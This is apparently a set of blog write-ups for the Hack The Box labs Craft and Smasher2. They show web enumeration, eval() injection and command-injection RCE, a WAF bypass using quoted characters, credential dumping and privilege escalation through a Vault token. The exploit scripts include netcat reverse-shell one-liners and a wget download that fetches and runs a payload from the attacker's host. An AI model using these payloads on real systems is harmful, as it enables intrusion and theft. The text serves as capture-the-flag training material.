443/tcp open  ssl/http nginx 1.15.8
|_http-server-header: nginx/1.15.8
|_http-title: About
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after:  2020-06-20T02:25:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.97 seconds
root@kali:~/Desktop/HTB/boxes/craft# 

We got https on port 443 and ssh on port 22.

Web Enumeration

The home page was kinda empty, Only the about info and nothing else:


The navigation bar had two external links, one of them was to https://api.craft.htb/api/ and the other one was to https://gogs.craft.htb:

<ul class="nav navbar-nav pull-right">
            <li><a href="https://api.craft.htb/api/">API</a></li>
            <li><a href="https://gogs.craft.htb/"><img border="0" alt="Git" src="/static/img/Git-Icon-Black.png" width="20" height="20"></a></li>
          </ul>

So I added both of api.craft.htb and gogs.craft.htb to /etc/hosts then I started checking them.
https://api.craft.htb/api:


Here we can see the API endpoints and how to interact with them.
We’re interested in the authentication part for now, there are two endpoints, /auth/check which checks the validity of an authorization token and /auth/login which creates an authorization token provided valid credentials.






We don’t have credentials to authenticate so let’s keep enumerating.
Obviously gogs.craft.htb had gogs running:


The repository of the API source code was publicly accessible so I took a look at the code and the commits.






Dinesh’s commits c414b16057 and 10e3ba4f0a had some interesting stuff. First one had some code additions to /brew/endpoints/brew.py where user’s input is being passed to eval() without filtering:


@@ -38,9 +38,13 @@ class BrewCollection(Resource):
         """
         Creates a new brew entry.
         """
-
-        create_brew(request.json)
-        return None, 201
+
+        # make sure the ABV value is sane.
+        if eval('%s > 1' % request.json['abv']):
+            return "ABV must be a decimal value less than 1.0", 400
+        else:
+            create_brew(request.json)
+            return None, 201
 @ns.route('/<int:id>')
 @api.response(404, 'Brew not found.')

I took a look at the API documentation again to find in which request I can send the abv parameter:


As you can see we can send a POST request to /brew and inject our payload in the parameter abv, However we still need an authorization token to be able to interact with /brew, and we don’t have any credentials.
The other commit was a test script which had hardcoded credentials, exactly what we need:


+response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
+json_response = json.loads(response.text)
+token =  json_response['token']
+
+headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json'  }
+
+# make sure token is valid
+response = requests.get('https://api.craft.htb/api/auth/check', headers=headers, verify=False)
+print(response.text)
+

I tested the credentials and they were valid:



RCE –> Shell on Docker Container

I wrote a small script to authenticate, grab the token, exploit the vulnerability and spawn a shell.
exploit.py:

#!/usr/bin/python3 
import requests
import json
from subprocess import Popen
from sys import argv
from os import system

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

GREEN = "\033[32m"
YELLOW = "\033[93m" 

def get_token():
	req = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
	response = req.json()
	token = response['token']
	return token

def exploit(token, ip, port):
	tmp = {}

	tmp['id'] = 0
	tmp['name'] = "pwned"
	tmp['brewer'] = "pwned"
	tmp['style'] = "pwned"
	tmp['abv'] = "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f')".format(ip,port)

	payload = json.dumps(tmp)

	print(YELLOW + "[+] Starting listener on port {}".format(port))
	Popen(["nc","-lvnp",port])

	print(YELLOW + "[+] Sending payload")
	requests.post('https://api.craft.htb/api/brew/', headers={'X-Craft-API-Token': token, 'Content-Type': 'application/json'}, data=payload, verify=False)

if len(argv) != 3:
	print(YELLOW + "[!] Usage: {} [IP] [PORT]".format(argv[0]))
	exit()

ip = argv[1]
port = argv[2]
print(YELLOW + "[+] Authenticating")
token = get_token()
print(GREEN + "[*] Token: {}".format(token))
exploit(token, ip, port)




Turns out that the application was hosted on a docker container and I didn’t get a shell on the actual host.

/opt/app # cd /
/ # ls -la
total 64
drwxr-xr-x    1 root     root          4096 Feb 10  2019 .
drwxr-xr-x    1 root     root          4096 Feb 10  2019 ..
-rwxr-xr-x    1 root     root             0 Feb 10  2019 .dockerenv
drwxr-xr-x    1 root     root          4096 Jan  3 17:20 bin
drwxr-xr-x    5 root     root           340 Jan  3 14:58 dev
drwxr-xr-x    1 root     root          4096 Feb 10  2019 etc
drwxr-xr-x    2 root     root          4096 Jan 30  2019 home
drwxr-xr-x    1 root     root          4096 Feb  6  2019 lib
drwxr-xr-x    5 root     root          4096 Jan 30  2019 media
drwxr-xr-x    2 root     root          4096 Jan 30  2019 mnt
drwxr-xr-x    1 root     root          4096 Feb  9  2019 opt
dr-xr-xr-x  238 root     root             0 Jan  3 14:58 proc
drwx------    1 root     root          4096 Jan  3 15:16 root
drwxr-xr-x    2 root     root          4096 Jan 30  2019 run
drwxr-xr-x    2 root     root          4096 Jan 30  2019 sbin
drwxr-xr-x    2 root     root          4096 Jan 30  2019 srv
dr-xr-xr-x   13 root     root             0 Jan  3 14:58 sys
drwxrwxrwt    1 root     root          4096 Jan  3 17:26 tmp
drwxr-xr-x    1 root     root          4096 Feb  9  2019 usr
drwxr-xr-x    1 root     root          4096 Jan 30  2019 var
/ #

Gilfoyle’s Gogs Credentials –> SSH Key –> SSH as Gilfoyle –> User Flag

In /opt/app there was a python script called dbtest.py, It connects to the database and executes a SQL query:

/opt/app # ls -la
total 44
drwxr-xr-x    5 root     root          4096 Jan  3 17:28 .
drwxr-xr-x    1 root     root          4096 Feb  9  2019 ..
drwxr-xr-x    8 root     root          4096 Feb  8  2019 .git
-rw-r--r--    1 root     root            18 Feb  7  2019 .gitignore
-rw-r--r--    1 root     root          1585 Feb  7  2019 app.py
drwxr-xr-x    5 root     root          4096 Feb  7  2019 craft_api
-rwxr-xr-x    1 root     root           673 Feb  8  2019 dbtest.py
drwxr-xr-x    2 root     root          4096 Feb  7  2019 tests
/opt/app # cat dbtest.py
#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)

finally:
    connection.close()
/opt/app #

I copied the script and changed result = cursor.fetchone() to result = cursor.fetchall() and I changed the query to SHOW TABLES:

#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SHOW TABLES"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)

finally:
    connection.close()

There were two tables, user and brew:

/opt/app # wget http://10.10.xx.xx/db1.py
Connecting to 10.10.xx.xx (10.10.xx.xx:80)
db1.py               100% |********************************|   629  0:00:00 ETA

/opt/app # python db1.py
[{'Tables_in_craft': 'brew'}, {'Tables_in_craft': 'user'}]
/opt/app # rm db1.py
/opt/app #

I changed the query to SELECT * FROM user:

#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SELECT * FROM user"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)

finally:
    connection.close()

The table had all users credentials stored in plain text:

/opt/app # wget http://10.10.xx.xx/db2.py
Connecting to 10.10.xx.xx (10.10.xx.xx:80)
db2.py               100% |********************************|   636  0:00:00 ETA

/opt/app # python db2.py
[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
/opt/app # rm db2.py
/opt/app #

Gilfoyle had a private repository called craft-infra:



He left his private ssh key in the repository:



When I tried to use the key it asked for password as it was encrypted, I tried his gogs password (ZEU3N8WNM2rh4T) and it worked:


We owned user.

Vault –> One-Time SSH Password –> SSH as root –> Root Flag

In Gilfoyle’s home directory there was a file called .vault-token:

gilfoyle@craft:~$ ls -la
total 44
drwx------ 5 gilfoyle gilfoyle 4096 Jan  3 13:42 .
drwxr-xr-x 3 root     root     4096 Feb  9  2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle  634 Feb  9  2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4096 Feb  9  2019 .config
drwx------ 2 gilfoyle gilfoyle 4096 Jan  3 13:31 .gnupg
-rw-r--r-- 1 gilfoyle gilfoyle  148 Feb  8  2019 .profile
drwx------ 2 gilfoyle gilfoyle 4096 Feb  9  2019 .ssh
-r-------- 1 gilfoyle gilfoyle   33 Feb  9  2019 user.txt
-rw------- 1 gilfoyle gilfoyle   36 Feb  9  2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 5091 Jan  3 13:28 .viminfo
gilfoyle@craft:~$ cat .vault-token 
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle@craft:~$

A quick search revealed that it’s related to vault.

Secure, store and tightly control access to tokens, passwords, certificates, encryption keys for protecting secrets and other sensitive data using a UI, CLI, or HTTP API. -vaultproject.io

By looking at vault.sh from craft-infra repository (vault/vault.sh), we’ll see that it enables the ssh secrets engine then creates an otp role for root:

#!/bin/bash

# set up vault secrets backend

vault secrets enable ssh

vault write ssh/roles/root_otp \
    key_type=otp \
    default_user=root \
    cidr_list=0.0.0.0/0

We have the token (.vault-token) so we can easily authenticate to the vault and create an otp for a root ssh session:

gilfoyle@craft:~$ vault login
Token (will be hidden): 
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor       1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration       ∞
token_renewable      false
token_policies       ["root"]
identity_policies    []
policies             ["root"]
gilfoyle@craft:~$ vault write ssh/creds/root_otp ip=127.0.0.1
Key                Value
---                -----
lease_id           ssh/creds/root_otp/f17d03b6-552a-a90a-02b8-0932aaa20198
lease_duration     768h
lease_renewable    false
ip                 127.0.0.1
key                c495f06b-daac-8a95-b7aa-c55618b037ee
key_type           otp
port               22
username           root
gilfoyle@craft:~$

And finally we’ll ssh into localhost and use the generated password (c495f06b-daac-8a95-b7aa-c55618b037ee):

gilfoyle@craft:~$ ssh [email protected]


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/



Password: 
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# 




And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Smasher2
Next Hack The Box write-up : Hack The Box - Bitlab

Hack The Box - Smasher2

By: 0xRick
14 December 2019 at 05:00

Hack The Box - Smasher2

Quick Summary

Hey guys, today smasher2 retired and here’s my write-up about it. Smasher2 was an interesting box and one of the hardest I have ever solved. Starting with a web application vulnerable to authentication bypass and RCE combined with a WAF bypass, then a kernel module with an insecure mmap handler implementation allowing users to access kernel memory. I enjoyed the box and learned a lot from it. It’s a Linux box and its ip is 10.10.10.135, I added it to /etc/hosts as smasher2.htb. Let’s jump right in!




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/smasher2# nmap -sV -sT -sC -o nmapinitial smasher2.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 07:32 EST
Nmap scan report for smasher2.htb (10.10.10.135)
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 23:a3:55:a8:c6:cc:74:cc:4d:c7:2c:f8:fc:20:4e:5a (RSA)
|   256 16:21:ba:ce:8c:85:62:04:2e:8c:79:fa:0e:ea:9d:33 (ECDSA)
|_  256 00:97:93:b8:59:b5:0f:79:52:e1:8a:f1:4f:ba:ac:b4 (ED25519)
53/tcp open  domain  ISC BIND 9.11.3-1ubuntu1.3 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.3-Ubuntu
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds
root@kali:~/Desktop/HTB/boxes/smasher2# 

We got ssh on port 22, dns on port 53 and http on port 80.

DNS

First thing I did was to enumerate vhosts through the dns server and I got 1 result:

root@kali:~/Desktop/HTB/boxes/smasher2# dig axfr smasher2.htb @10.10.10.135

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> axfr smasher2.htb @10.10.10.135
;; global options: +cmd
smasher2.htb.           604800  IN      SOA     smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
smasher2.htb.           604800  IN      NS      smasher2.htb.
smasher2.htb.           604800  IN      A       127.0.0.1
smasher2.htb.           604800  IN      AAAA    ::1
smasher2.htb.           604800  IN      PTR     wonderfulsessionmanager.smasher2.htb.
smasher2.htb.           604800  IN      SOA     smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
;; Query time: 299 msec
;; SERVER: 10.10.10.135#53(10.10.10.135)
;; WHEN: Fri Dec 13 07:36:43 EST 2019
;; XFR size: 6 records (messages 1, bytes 242)

root@kali:~/Desktop/HTB/boxes/smasher2# 

wonderfulsessionmanager.smasher2.htb, I added it to my hosts file.

Web Enumeration

http://smasher2.htb had the default Apache index page:


http://wonderfulsessionmanager.smasher2.htb:


The only interesting here was the login page:


I kept testing it for a while and the responses were like this one:



It didn’t request any new pages so I suspected that it’s doing an AJAX request, I intercepted the login request to find out the endpoint it was requesting:

POST /auth HTTP/1.1
Host: wonderfulsessionmanager.smasher2.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wonderfulsessionmanager.smasher2.htb/login
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 80
Connection: close
Cookie: session=eyJpZCI6eyIgYiI6Ik16UXpNakpoTVRVeVlqaGlNekJsWVdSbU9HTXlPV1kzTmprMk1XSTROV00xWkdVME5HTmxNQT09In19.XfNxUQ.MznJKgs2isklCZxfV4G0IjEPcvg

{"action":"auth","data":{"username":"test","password":"test"}}

While browsing http://wonderfulsessionmanager.smasher2.htb I had gobuster running in the background on http://smasher2.htb/:

root@kali:~/Desktop/HTB/boxes/smasher2# gobuster dir -u http://smasher2.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://smasher2.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/13 07:37:54 Starting gobuster
===============================================================
/.git/HEAD (Status: 403)
/.hta (Status: 403)
/.bash_history (Status: 403)
/.config (Status: 403)
/.bashrc (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.profile (Status: 403)
/.mysql_history (Status: 403)
/.sh_history (Status: 403)
/.svn/entries (Status: 403)
/_vti_bin/_vti_adm/admin.dll (Status: 403)
/_vti_bin/shtml.dll (Status: 403)
/_vti_bin/_vti_aut/author.dll (Status: 403)
/akeeba.backend.log (Status: 403)
/awstats.conf (Status: 403)
/backup (Status: 301)
/development.log (Status: 403)
/global.asa (Status: 403)
/global.asax (Status: 403)
/index.html (Status: 200)
/main.mdb (Status: 403)
/php.ini (Status: 403)
/production.log (Status: 403)
/readfile (Status: 403)
/server-status (Status: 403)
/spamlog.log (Status: 403)
/Thumbs.db (Status: 403)
/thumbs.db (Status: 403)
/web.config (Status: 403)
/WS_FTP.LOG (Status: 403)
===============================================================
2019/12/13 07:39:17 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/smasher2# 

The only result that wasn’t 403 was /backup so I checked that and found 2 files:


Note: Months ago when I solved this box for the first time /backup was protected by basic http authentication, that wasn’t the case when I revisited the box for the write-up even after resetting it. I guess it got removed, however it wasn’t an important step, it was just heavy brute force so the box is better without it.
I downloaded the files to my box:

root@kali:~/Desktop/HTB/boxes/smasher2# mkdir backup
root@kali:~/Desktop/HTB/boxes/smasher2# cd backup/
root@kali:~/Desktop/HTB/boxes/smasher2/backup# wget http://smasher2.htb/backup/auth.py
--2019-12-13 07:40:19--  http://smasher2.htb/backup/auth.py
Resolving smasher2.htb (smasher2.htb)... 10.10.10.135
Connecting to smasher2.htb (smasher2.htb)|10.10.10.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4430 (4.3K) [text/x-python]
Saving to: β€˜auth.py’

auth.py                                                    100%[=======================================================================================================================================>]   4.33K  --.-KB/s    in 0.07s   

2019-12-13 07:40:20 (64.2 KB/s) - β€˜auth.py’ saved [4430/4430]

root@kali:~/Desktop/HTB/boxes/smasher2/backup# wget http://smasher2.htb/backup/ses.so 
--2019-12-13 07:40:43--  http://smasher2.htb/backup/ses.so
Resolving smasher2.htb (smasher2.htb)... 10.10.10.135
Connecting to smasher2.htb (smasher2.htb)|10.10.10.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18608 (18K)
Saving to: β€˜ses.so’

ses.so                                                     100%[=======================================================================================================================================>]  18.17K  85.2KB/s    in 0.2s    

2019-12-13 07:40:44 (85.2 KB/s) - β€˜ses.so’ saved [18608/18608]

root@kali:~/Desktop/HTB/boxes/smasher2/backup# 

By looking at auth.py I knew that these files were related to wonderfulsessionmanager.smasher2.htb.

auth.py: Analysis

auth.py:

#!/usr/bin/env python
import ses
from flask import session,redirect, url_for, request,render_template, jsonify,Flask, send_from_directory
from threading import Lock
import hashlib
import hmac
import os
import base64
import subprocess
import time

def get_secure_key():
    m = hashlib.sha1()
    m.update(os.urandom(32))
    return m.hexdigest()

def craft_secure_token(content):
    h = hmac.new("HMACSecureKey123!", base64.b64encode(content).encode(), hashlib.sha256)
    return h.hexdigest()


lock = Lock()
app = Flask(__name__)
app.config['SECRET_KEY'] = get_secure_key()
Managers = {}

def log_creds(ip, c):
    with open("creds.log", "a") as creds:
        creds.write("Login from {} with data {}:{}\n".format(ip, c["username"], c["password"]))
        creds.close()

def safe_get_manager(id):
    lock.acquire()
    manager = Managers[id]
    lock.release()
    return manager

def safe_init_manager(id):
    lock.acquire()
    if id in Managers:
        del Managers[id]
    else:
            login = ["<REDACTED>", "<REDACTED>"]
            Managers.update({id: ses.SessionManager(login, craft_secure_token(":".join(login)))})
    lock.release()

def safe_have_manager(id):
    ret = False
    lock.acquire()
    ret = id in Managers
    lock.release()
    return ret

@app.before_request
def before_request():
    if request.path == "/":
        if not session.has_key("id"):
            k = get_secure_key()
            safe_init_manager(k)
            session["id"] = k
        elif session.has_key("id") and not safe_have_manager(session["id"]):
            del session["id"]
            return redirect("/", 302)
    else:
        if session.has_key("id") and safe_have_manager(session["id"]):
            pass
        else:
            return redirect("/", 302)

@app.after_request
def after_request(resp):
    return resp


@app.route('/assets/<path:filename>')
def base_static(filename):
    return send_from_directory(app.root_path + '/assets/', filename)


@app.route('/', methods=['GET'])
def index():
    return render_template("index.html")


@app.route('/login', methods=['GET'])
def view_login():
    return render_template("login.html")

@app.route('/auth', methods=['POST'])
def login():
    ret = {"authenticated": None, "result": None}
    manager = safe_get_manager(session["id"])
    data = request.get_json(silent=True)
    if data:
        try:
            tmp_login = dict(data["data"])
        except:
            pass
        tmp_user_login = None
        try:
            is_logged = manager.check_login(data)
            secret_token_info = ["/api/<api_key>/job", manager.secret_key, int(time.time())]
            try:
                tmp_user_login = {"username": tmp_login["username"], "password": tmp_login["password"]}
            except:
                pass
            if not is_logged[0]:
                ret["authenticated"] = False
                ret["result"] = "Cannot authenticate with data: %s - %s" % (is_logged[1], "Too many tentatives, wait 2 minutes!" if manager.blocked else "Try again!")
            else:
                if tmp_user_login is not None:
                    log_creds(request.remote_addr, tmp_user_login)
                ret["authenticated"] = True
                ret["result"] = {"endpoint": secret_token_info[0], "key": secret_token_info[1], "creation_date": secret_token_info[2]}
        except TypeError as e:
            ret["authenticated"] = False
            ret["result"] = str(e)
    else:
        ret["authenticated"] = False
        ret["result"] = "Cannot authenticate missing parameters."
    return jsonify(ret)


@app.route("/api/<key>/job", methods=['POST'])
def job(key):
    ret = {"success": None, "result": None}
    manager = safe_get_manager(session["id"])
    if manager.secret_key == key:
        data = request.get_json(silent=True)
        if data and type(data) == dict:
            if "schedule" in data:
                out = subprocess.check_output(['bash', '-c', data["schedule"]])
                ret["success"] = True
                ret["result"] = out
            else:
                ret["success"] = False
                ret["result"] = "Missing schedule parameter."
        else:
            ret["success"] = False
            ret["result"] = "Invalid value provided."
    else:
        ret["success"] = False
        ret["result"] = "Invalid token."
    return jsonify(ret)


app.run(host='127.0.0.1', port=5000)

I read the code and these are the things that interest us:
After successful authentication the server will respond with a secret key that we can use to access the endpoint /api/<key>/job:

                ret["authenticated"] = True
                ret["result"] = {"endpoint": secret_token_info[0], "key": secret_token_info[1], "creation_date": secret_token_info[2]}
            secret_token_info = ["/api/<api_key>/job", manager.secret_key, int(time.time())]

That endpoint only accepts POST requests:

@app.route("/api/<key>/job", methods=['POST'])

And the sent data has to be json:

        data = request.get_json(silent=True)
        if data and type(data) == dict:
            ...

Through that endpoint we can execute system commands by providing them in a parameter called schedule:

            if "schedule" in data:
                out = subprocess.check_output(['bash', '-c', data["schedule"]])
                ret["success"] = True
                ret["result"] = out

session.so: Analysis –> Authentication Bypass

session.so is a compiled shared python library, so stands for shared object:

root@kali:~/Desktop/HTB/boxes/smasher2/backup# file ses.so 
ses.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0c67d40b77854318b10417b4aedfee95a52f0550, not stripped
root@kali:~/Desktop/HTB/boxes/smasher2/backup#

I opened it in ghidra and started checking the functions. Two functions caught my attention, get_internal_pwd() and get_internal_usr():


I looked at the decompiled code of both of them and noticed something strange, they were the exact same: get_internal_pwd():

undefined8 get_internal_pwd(undefined8 param_1)

{
  long *plVar1;
  undefined8 uVar2;
  
  plVar1 = (long *)PyObject_GetAttrString(param_1,"user_login");
  uVar2 = PyList_GetItem(plVar1,0);
  uVar2 = PyString_AsString(uVar2);
  *plVar1 = *plVar1 + -1;
  if (*plVar1 == 0) {
    (**(code **)(plVar1[1] + 0x30))(plVar1);
  }
  return uVar2;
}

get_internal_usr():

undefined8 get_internal_usr(undefined8 param_1)

{
  long *plVar1;
  undefined8 uVar2;
  
  plVar1 = (long *)PyObject_GetAttrString(param_1,"user_login");
  uVar2 = PyList_GetItem(plVar1,0);
  uVar2 = PyString_AsString(uVar2);
  *plVar1 = *plVar1 + -1;
  if (*plVar1 == 0) {
    (**(code **)(plVar1[1] + 0x30))(plVar1);
  }
  return uVar2;
}
root@kali:~/Desktop/HTB/boxes/smasher2/backup# diff getinternalusr getinternalpwd 
1c1
< undefined8 get_internal_usr(undefined8 param_1)
---
> undefined8 get_internal_pwd(undefined8 param_1)
root@kali:~/Desktop/HTB/boxes/smasher2/backup#

So in theory, since the two function are identical, providing the username as a password should work. Which means that it’s just a matter of finding an existing username and we’ll be able to bypass the authentication.
I tried some common usernames before attempting to use wfuzz, Administrator worked:



WAF Bypass –> RCE –> Shell as dzonerzy –> User Flag

I wrote a small script to execute commands through /api/<key>/job as we saw earlier in auth.py, the script was meant for testing purposes:

#!/usr/bin/python3
from requests import post

cookies = {"session":"eyJpZCI6eyIgYiI6Ik16UXpNakpoTVRVeVlqaGlNekJsWVdSbU9HTXlPV1kzTmprMk1XSTROV00xWkdVME5HTmxNQT09In19.XfNxUQ.MznJKgs2isklCZxfV4G0IjEPcvg"}

while True:
	cmd = input("cmd: ")
	req = post("http://wonderfulsessionmanager.smasher2.htb/api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job", json={"schedule":cmd}, cookies=cookies)
	response = req.text
	print(response)

Testing with whoami worked just fine:

root@kali:~/Desktop/HTB/boxes/smasher2# ./test.py 
cmd: whoami
{"result":"dzonerzy\n","success":true}

cmd:

However when I tried other commands I got a 403 response indicating that the server was protected by a WAF:

cmd: curl http://10.10.xx.xx
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job
on this server.<br />
</p>

<address>Apache/2.4.29 (Ubuntu) Server at wonderfulsessionmanager.smasher2.htb Port 80</address>
</body></html>

cmd:

I could easily bypass it by inserting single quotes in the command:

cmd: 'w'g'e't 'h't't'p':'/'/'1'0'.'1'0'.'x'x'.'x'x'/'t'e's't'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request.  Either the server is overloaded or there is an error in the application.</p>

cmd:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.135 - - [13/Dec/2019 08:18:33] code 404, message File not found
10.10.10.135 - - [13/Dec/2019 08:18:33] "GET /test HTTP/1.1" 404 -

To automate the exploitation process I wrote this small exploit:

#!/usr/bin/python3 
import requests

YELLOW = "\033[93m"
GREEN = "\033[32m"

def getKey(session):
	req = session.post("http://wonderfulsessionmanager.smasher2.htb/auth", json={"action":"auth","data":{"username":"Administrator","password":"Administrator"}})
	response = req.json()
	key = response['result']['key']
	return key

def exploit(session, key):
	download_payload = "\'w\'g\'e\'t \'h\'t\'t\'p\':\'/\'/\'1\'0\'.\'1\'0\'.\'x\'x\'.\'x\'x\'/\'s\'h\'e\'l\'l\'.\'s\'h\'"
	print(YELLOW + "[+] Downloading payload")
	download_req = session.post("http://wonderfulsessionmanager.smasher2.htb/api/{}/job".format(key), json={"schedule":download_payload})
	print(GREEN + "[*] Done")
	exec_payload = "s\'h\' \'s\'h\'e\'l\'l\'.\'s\'h"
	print(YELLOW + "[+] Executing payload")
	exec_req = session.post("http://wonderfulsessionmanager.smasher2.htb/api/{}/job".format(key), json={"schedule":exec_payload})
	print(GREEN + "[*] Done. Exiting ...")
	exit()

session = requests.Session()
session.get("http://wonderfulsessionmanager.smasher2.htb/login")
print(YELLOW +"[+] Authenticating")
key = getKey(session)
print(GREEN + "[*] Session: " + session.cookies.get_dict()['session'])
print(GREEN + "[*] key: " + key)
exploit(session, key)

The exploit sends 2 commands, the first one is a wget command that downloads shell.sh and the other one executes it.
shell.sh:

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f

I hosted it on a python server and I started a netcat listener on port 1337 then I ran the exploit:


We owned user.

dhid.ko: Enumeration

After getting a shell I copied my public ssh key to /home/dzonerzy/.ssh/authorized_keys and got ssh access.
In the home directory of dzonerzy there was a README containing a message from him saying that we’ll need to think outside the box to root smasher2:

dzonerzy@smasher2:~$ ls -al
total 44
drwxr-xr-x 6 dzonerzy dzonerzy 4096 Feb 17  2019 .
drwxr-xr-x 3 root     root     4096 Feb 15  2019 ..
lrwxrwxrwx 1 dzonerzy dzonerzy    9 Feb 15  2019 .bash_history -> /dev/null
-rw-r--r-- 1 dzonerzy dzonerzy  220 Feb 15  2019 .bash_logout
-rw-r--r-- 1 dzonerzy dzonerzy 3799 Feb 16  2019 .bashrc
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15  2019 .cache
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15  2019 .gnupg
drwx------ 5 dzonerzy dzonerzy 4096 Feb 17  2019 .local
-rw-r--r-- 1 dzonerzy dzonerzy  807 Feb 15  2019 .profile
